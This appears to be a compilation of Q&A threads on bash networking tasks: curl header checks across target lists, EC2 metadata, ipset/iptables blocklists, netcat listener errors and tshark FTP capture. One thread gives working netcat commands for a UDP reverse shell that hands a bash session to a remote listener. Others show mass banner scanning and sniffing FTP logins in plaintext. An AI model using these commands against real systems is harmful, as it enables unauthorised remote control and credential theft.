Script that will print HTTP headers for multiple servers - bash

I've created the following bash script:
#!/bin/bash
for ip in $(cat targets.txt); do
"curl -I -k https://"${ip};
"curl -I http://"${ip}
done
However, I am not receiving the expected output, which should be the HTTP header responses from the IP addresses listed in targets.txt.
I'm not sure how curl can attempt both HTTP and HTTPS (80/443) within one command, so I've set up two separate curl commands.

nmap might be more appropriate for the task: nmap -iL targets.txt -p T:80,443 -sV --script=banner --open
Perform a network map (nmap) of hosts from the input list (-iL targets.txt) on TCP ports 80 and 443 (-p T:80,443) with service/version detection (-sV) and use the banner grabber script (--script=banner, ref. https://nmap.org/nsedoc/scripts/banner.html). Return results for open ports (--open).
... or masscan (ref. https://github.com/robertdavidgraham/masscan): masscan $(cat targets.txt) -p 80,443 --banners
Mass scan (masscan) all targets on ports 80 and 443 (-p 80,443) and grab banners (--banners).
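If targets.txt is long, the $(cat targets.txt) substitution may hit the shell's argument-length limit; masscan can also read targets from a file directly (a sketch, assuming your masscan build supports the nmap-style -iL include-file option):
masscan -iL targets.txt -p 80,443 --banners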

Remove the quotes around your curl commands. You also don't need the ; after the first curl.
#!/bin/bash
for ip in $(cat targets.txt); do
curl -I -k https://${ip}
curl -I http://${ip}
done

I added some echo statements to @John's answer to get better visibility into the results of the curl executions. I also added port 8080 in case of a proxy.
#!/bin/bash
for ip in $(cat $1); do
echo "> Webserver Port Scan on IP ${ip}."
echo "Attempting IP ${ip} on port 443..."
curl -I -k https://${ip}
echo "Attempting IP ${ip} on port 80..."
curl -I http://${ip}
echo "Attempting IP ${ip} on port 8080..."
curl -I http://${ip}:8080
done
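A more defensive variant of the loop (a sketch; the 5-second timeout is an arbitrary choice): for ip in $(cat ...) word-splits and glob-expands the file contents, and a single unresponsive host can stall the scan, so reading line by line with a connection timeout is more robust:
#!/bin/bash
# Read targets line by line to avoid word-splitting/globbing surprises;
# --connect-timeout keeps a dead host from hanging the loop.
while IFS= read -r ip; do
echo "> Webserver Port Scan on IP ${ip}."
curl -sSI -k --connect-timeout 5 "https://${ip}"
curl -sSI --connect-timeout 5 "http://${ip}"
curl -sSI --connect-timeout 5 "http://${ip}:8080"
done < "${1:-targets.txt}"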

How can I have my bash script pull in my EC2 instance IP address?

I'm trying to update my /etc/hosts file with my EC2 instance's IP address, but I keep getting errors. Here's the portion of my bash script that is trying to accomplish this:
TOKEN=curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
INSTANCE_IP=wget --header="X-aws-ec2-metadata-token:$TOKEN" -qO- http://instance-data/latest/meta-data/local-ipv4
echo "$INSTANCE_IP whatever.hostname.com" | tee -a /etc/hosts
When running this, I got an error saying -s: command not found, so I removed that from the script and tried again, and now I'm getting the error -X: command not found. How can I pull in the instance's IPv4 address via SSM? I'm also using the Amazon Linux 2 AMI for my instances.
The syntax is off: without command substitution, bash parses TOKEN=curl as a plain variable assignment and then tries to execute -s as a command, which is exactly the error you saw. Try it this way:
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
INSTANCE_IP=$(wget --header="X-aws-ec2-metadata-token:$TOKEN" -qO- http://instance-data/latest/meta-data/local-ipv4)
echo "$INSTANCE_IP whatever.hostname.com" | tee -a /etc/hosts

Obtain reverse shell over UDP with netcat

I want to get a reverse shell over UDP using netcat. Netcat sends traffic over TCP by default, so in order to send it over UDP I pass the -u option like this:
Host 1:
nc.traditional -l -p 4444 -v -u
Host 2:
nc.traditional localhost 4444 -e /bin/bash -u
But when I type a bash command I do not get the output. Why is that?
There are several problems with this:
You use localhost on Host 2. This is a special hostname that refers to the current host, not to Host 1.
UDP has no connections. Host 1 won't know where to send packets if it doesn't receive a message first.
bash reads input character by character, which doesn't work well with packet-based (non-stream) data.
You can instead connect nc and bash with streams, and then send an immediate packet so that Host 1 will know where to send the commands you enter:
Host 1:
nc.traditional -l -p 4444 -v -u
Host 2:
mkfifo fifo
nc.traditional -u host1 4444 < fifo |
{
echo "Hi"
bash
} > fifo

How to quickly add rules to iptables from blocklists?

I am using Ubuntu Server 14.04 32bit for the following.
I am trying to use blocklists to add regional blocks (China, Russia...) to my firewall rules, and am struggling with how long my script takes to complete and with understanding why a different script fails to work.
I had originally used http://whatnotlinux.blogspot.com/2012/12/add-block-lists-to-iptables-from.html as an example and tidied up / changed parts of the script to get pretty close to what's below:
#!/bin/bash
# Blacklist's names & URLs array
declare -A blacklists
blacklists[china]="http://www.example.com"
#blacklists[key]="url"
for key in ${!blacklists[@]}; do
#Download blacklist
wget --output-document=/tmp/blacklist_$key.gz -w 3 ${blacklists[$key]}
iptables -D INPUT -j $key #Delete current iptables chain link
iptables -F $key #Flush current iptables chain
iptables -X $key #Delete current iptables chain
iptables -N $key #Create current iptables chain
iptables -A INPUT -j $key #Link current iptables chain to INPUT chain
#Read blacklist
while read line; do
#Drop description, keep only IP range
ip_range=`echo -n $line | sed -e 's/.*:\(.*\)-\(.*\)/\1-\2/'`
#Test if it's an IP range
if [[ $ip_range =~ ^[0-9].*$ ]]; then
# Add to the blacklist
iptables -A $key -m iprange --src-range $ip_range -j LOGNDROP
fi
done < <(zcat /tmp/blacklist_$key.gz | iconv -f latin1 -t utf-8 - | dos2unix)
done
# Delete files
rm /tmp/blacklist*
exit 0
This appears to work fine for short test lists, but manually adding many (200,000+) entries to iptables takes an EXORBITANT amount of time, and I'm not sure why. Depending on the list, I have calculated this taking upwards of 10 hours to complete, which just seems silly.
After viewing the format of the iptables-save output I created a new script that uses iptables-save to save working iptables rules and then appends the expected format for blocks to this file, such as: -A bogon -m iprange --src-range 0.0.0.1-0.255.255.255 -j LOGNDROP, and eventually uses iptables-restore to load the file as seen below:
#!/bin/bash
# Blacklist's names & URLs arrays
declare -A blacklists
blacklists[china]="http://www.example.com"
#blacklists[key]="url"
iptables -F # Flush iptables chains
iptables -X # Delete all user created chains
iptables -P FORWARD DROP # Drop all forwarded traffic
iptables -N LOGNDROP # Create LOGNDROP chain
iptables -A LOGNDROP -p tcp -m limit --limit 5/min -j LOG --log-prefix "Denied TCP: " --log-level 7
iptables -A LOGNDROP -p udp -m limit --limit 5/min -j LOG --log-prefix "Denied UDP: " --log-level 7
iptables -A LOGNDROP -p icmp -m limit --limit 5/min -j LOG --log-prefix "Denied ICMP: " --log-level 7
iptables -A LOGNDROP -j DROP # Drop after logging
# Build first part of iptables-rules
for key in ${!blacklists[@]}; do
iptables -N $key # Create chain for current list
iptables -A INPUT -j $key # Link input to current list chain
done
iptables-save | sed '$d' | sed '$d' > /tmp/iptables-rules.rules # Save WORKING iptables-rules and remove last 2 lines (COMMIT & comment)
for key in ${!blacklists[@]}; do
#Download blacklist
wget --output-document=/tmp/blacklist_$key.gz -w 3 ${blacklists[$key]}
zcat /tmp/blacklist_$key.gz | sed '1,2d' | sed s/.*:/-A\ $key\ -m\ iprange\ --src-range\ / | sed s/$/\ -j\ LOGNDROP/ >> /tmp/iptables-rules.rules
done
echo 'COMMIT' >> /tmp/iptables-rules.rules
iptables-restore < /tmp/iptables-rules.rules
# Delete files
rm /tmp/blacklist*
rm /tmp/iptables-rules.rules
exit 0
This works great for most lists on the testbed, however there are specific lists that, if included, will produce the error iptables-restore: line 389971 failed, which is always the last line (COMMIT). I've read that, due to the way iptables-restore works, whenever there is an issue loading the rules the error always reports the last line as failed.
The truly odd thing is that, when testing these same lists on Ubuntu Desktop 14.04 64-bit, the second script works just fine. I have tried running the script on the Desktop machine, then using iptables-save to save a "properly" formatted version of the ruleset, and then loading this file to iptables on the server using iptables-restore, and I still receive the error.
I am at a loss as to how to troubleshoot this, why the initial script takes so long to add rules to iptables, and what could potentially be causing problems with the lists in the second script.
If you need to block a multitude of IP addresses, use ipset instead. Each iptables invocation copies the entire ruleset out of the kernel, modifies it, and loads it back, so appending 200,000+ rules one at a time does quadratic work, whereas a hash-based ipset sits behind a single rule and is matched in roughly constant time.
Step 1: Create the IPset:
# Hashsize of 1024 is usually enough. Higher numbers might speed up the search,
# but at the cost of higher memory usage.
ipset create BlockAddress hash:ip hashsize 1024
Step 2: Add the addresses to block into that IPset:
# Put this in a loop, the loop reading a file containing list of addresses to block
ipset add BlockAddress $IP_TO_BLOCK
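The loop mentioned in the comment might look like this (a sketch; the blocklist path is illustrative, and -exist suppresses errors for addresses already in the set):
while read -r IP_TO_BLOCK; do
ipset -exist add BlockAddress "$IP_TO_BLOCK"
done < /path/to/blocklist.txt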
Finally, replace all those lines to block with just one line in netfilter:
iptables -t raw -A PREROUTING -m set --match-set BlockAddress src -j DROP
Done. iptables-restore will be mucho fasta.
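Note that ipset contents do not survive a reboot; a common approach (a sketch, the file path is arbitrary) is to dump the set and reload it at boot, before any iptables rule that references it:
ipset save BlockAddress > /etc/ipset.conf
ipset restore < /etc/ipset.conf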
IMPORTANT NOTE: I strongly suggest NOT putting domain names into netfilter rules; netfilter must first do a DNS resolve, and if DNS is not properly configured and/or too slow, it will fail. Instead, pre-resolve (or periodically resolve) the domain names you want to block, and feed the resulting IP addresses into the "file containing list of addresses to block". It should be an easy script, invoked from crontab every 5 minutes or so.
EDIT 1:
This is an example of a cronjob I use to get facebook.com's address, invoked every 5 minutes:
#!/bin/bash
fbookfile=/etc/iptables.d/facebook.ip
for d in www.facebook.com m.facebook.com facebook.com; do
dig +short "$d" >> "$fbookfile"
done
sort -n -u "$fbookfile" -o "$fbookfile"
Every half hour, another cronjob feeds those addresses to ipset:
#!/bin/bash
ipset flush IP_Fbook
while read ip; do
ipset add IP_Fbook "$ip"
done < /etc/iptables.d/facebook.ip
Note: I have to do this because doing dig +short facebook.com, for instance, returns exactly ONE IP address. After some observation, the returned address changed every ~5 minutes. Since I'm too busy to make an optimized version, I took the easy way out and do a flush/rebuild only every 30 minutes to minimize CPU spikes.
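If the brief empty-set window during the flush/rebuild ever matters, ipset can replace a set atomically with swap; a sketch of the same cronjob using that approach (set names are illustrative):
#!/bin/bash
# Build the new addresses into a spare set, then atomically swap it with
# the live one, so matching never sees a half-filled set.
ipset -exist create IP_Fbook_tmp hash:ip
ipset flush IP_Fbook_tmp
while read -r ip; do
ipset -exist add IP_Fbook_tmp "$ip"
done < /etc/iptables.d/facebook.ip
ipset swap IP_Fbook_tmp IP_Fbook
ipset destroy IP_Fbook_tmp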
The following is how I ended up solving this using ipsets as well.
#!/bin/bash
# Blacklist names & URLs array
declare -A blacklists
blacklists[China]="url"
# blacklists[key]="url"
# etc...
for key in ${!blacklists[@]}; do
# Download blacklist
wget --output-document=/tmp/blacklist_$key.gz -w 3 ${blacklists[$key]}
# Create ipset for current blacklist
ipset create $key hash:net maxelem 400000
# TODO method for determining appropriate maxelem
while read line; do
# Add addresses from list to ipset
ipset add $key $line -quiet
done < <(zcat /tmp/blacklist_$key.gz | sed '1,2d' | sed s/.*://)
# Add rules to iptables
iptables -D INPUT -m set --match-set $key src -j $key # Delete link to list chain from INPUT
iptables -F $key # Flush list chain if existed
iptables -X $key # Delete list chain if existed
iptables -N $key # Create list chain
iptables -A $key -p tcp -m limit --limit 5/min -j LOG --log-prefix "Denied $key TCP: " --log-level 7
iptables -A $key -p udp -m limit --limit 5/min -j LOG --log-prefix "Denied $key UDP: " --log-level 7
iptables -A $key -p icmp -m limit --limit 5/min -j LOG --log-prefix "Denied $key ICMP: " --log-level 7
iptables -A $key -j DROP # Drop after logging
iptables -A INPUT -m set --match-set $key src -j $key
done
I'm not wildly familiar with ipsets but this makes for a much faster method of downloading, parsing and adding blocks.
I've added individual chains for each list for more verbose logging, so the logs show which blocklist a dropped IP came from if you use multiple lists. On my actual box I'm using around 10 lists and have added several hundred thousand addresses with no problem!
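For the maxelem TODO above, one possible approach (an illustration, not from the original post) is to count the list's entries first and size the set from that:
# Count entries in the decompressed list, then create the set with headroom.
count=$(zcat /tmp/blacklist_$key.gz | sed '1,2d' | wc -l)
ipset create $key hash:net maxelem $(( count + 1000 ))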
Download Zones
#!/bin/bash
# http://www.ipdeny.com/ipblocks/
zone=/path_to_folder/zones
if [ ! -d $zone ]; then mkdir -p $zone; fi
wget -c -N http://www.ipdeny.com/ipblocks/data/countries/all-zones.tar.gz
tar -C $zone -zxvf all-zones.tar.gz >/dev/null 2>&1
rm -f all-zones.tar.gz >/dev/null 2>&1
Edit your iptables bash script and add the following lines:
#!/bin/bash
ipset=/sbin/ipset
iptables=/sbin/iptables
zone=/path_to_folder/zones
route=/path_to_blackip/
$ipset -F
$ipset -N -! blockzone hash:net maxelem 1000000
for ip in $(cat $zone/{cn,ru}.zone $route/blackip.txt); do
$ipset -A blockzone $ip
done
$iptables -t mangle -A PREROUTING -m set --match-set blockzone src -j DROP
$iptables -A FORWARD -m set --match-set blockzone dst -j DROP
Example: "blackip.txt" is your own IP blacklist, and "cn,ru" are the China and Russia zone files.
Source: blackip

Bash script UDP error

I execute my bash script PLCCheck as a process:
./PLCCheck &
PLCCheck
while read -r line
do
...
def_host=192.168.100.110
def_port=6002
HOST=${2:-$def_host}
PORT=${3:-$def_port}
echo -n "OKConnection" | netcat -u -c $HOST $PORT
done < <(netcat -u -l -p 6001)
It listens on UDP Port 6001.
When I want to execute my second bash script SQLCheck as a process that listens on UDP port 4001
./SQLCheck &
SQLCheck
while read -r line
do
...
def_host=192.168.100.110
def_port=6002
HOST=${2:-$def_host}
PORT=${3:-$def_port}
echo -n "OPENEF1" | netcat -u -c $HOST $PORT
done < <(nc -l -p 4001)
I got this error:
Error: Couldn't setup listening socket (err=-3)
Ports 6001 and 4001 are open in iptables, and each script works on its own as a single process. Why do I get this error?
I have checked the man page of nc. I think it is being used the wrong way:
-l Used to specify that nc should listen for an incoming connection rather
than initiate a connection to a remote host. It is an error to use this
option in conjunction with the -p, -s, or -z options. Additionally,
any timeouts specified with the -w option are ignored.
...
-p source_port
Specifies the source port nc should use, subject to privilege restrictions
and availability. It is an error to use this option in conjunction with the
-l option.
According to this, one should not use the -l option together with the -p option!
Try it without -p, just nc -l 4001. Maybe this is the error...
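The accepted flag combinations differ between netcat variants, so here is a sketch of both listener forms (check which variant is installed before choosing):
# OpenBSD nc: the listen port is a positional argument, no -p
nc -u -l 4001
# traditional netcat: -p is required together with -l
nc.traditional -u -l -p 4001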

Capture ftp hostname and uri using tshark (wireshark)

I want to watch FTP traffic and find which FTP URLs are being accessed with tshark. For HTTP traffic I can use
tshark -i eth0 -f 'port 80' -l -t ad -n -R 'http.request' -T fields -e http.host -e http.request.uri
Wireshark's display filter reference contains the fields http.request.uri and http.host
See: http://www.wireshark.org/docs/dfref/h/http.html
But equivalent options are not available for FTP traffic:
http://www.wireshark.org/docs/dfref/f/ftp.html
What can I do?
The problem is that FTP is not a stateless transactional protocol like HTTP: with HTTP, the client makes a single request that details all the parameters required to deliver the file, and the server responds with a single message containing all the metadata and the file contents.
In comparison, FTP is a chat-style protocol: to get something done you open a connection to the server and start chatting with it - log in, change to some directory, list files, get me this file, and so on.
You can listen in on this conversation using wireshark like this:
tshark -i lo -f 'port 21' -l -t ad -n -R ftp.request.command -T fields -e ftp.request.command -e ftp.request.arg
The output received when a user tries to retrieve a file from the FTP server (in this example using the client software curl) might look like this:
USER username
PASS password
PWD
CWD Documents
EPSV
TYPE I
SIZE somefile.ext
RETR somefile.ext
QUIT
A bit of processing over that might give you a URL-like log of file retrievals. For example, I came up with this using perl:
tshark -i lo -f 'port 21' -l -t ad -n -R ftp.request.command \
-T fields -e ftp.request.command -e ftp.request.arg | \
perl -nle '
m|CWD\s*(\S+)| and do {
$dir=$1;
if ($dir =~ m,^/,) { $cwd=$dir } else { $cwd .= "/$dir"; }
};
m|RETR\s*(\S+)| and print "$cwd/$1";'
For the same FTP session above, this script will yield a single line of output:
/Documents/somefile.ext
I hope that helps.
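One caveat: newer tshark releases reserve -R for two-pass analysis (with -2) and use -Y for single-pass display filters, so if your tshark rejects -R the equivalent capture line would be:
tshark -i lo -f 'port 21' -l -t ad -n -Y ftp.request.command -T fields -e ftp.request.command -e ftp.request.arg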
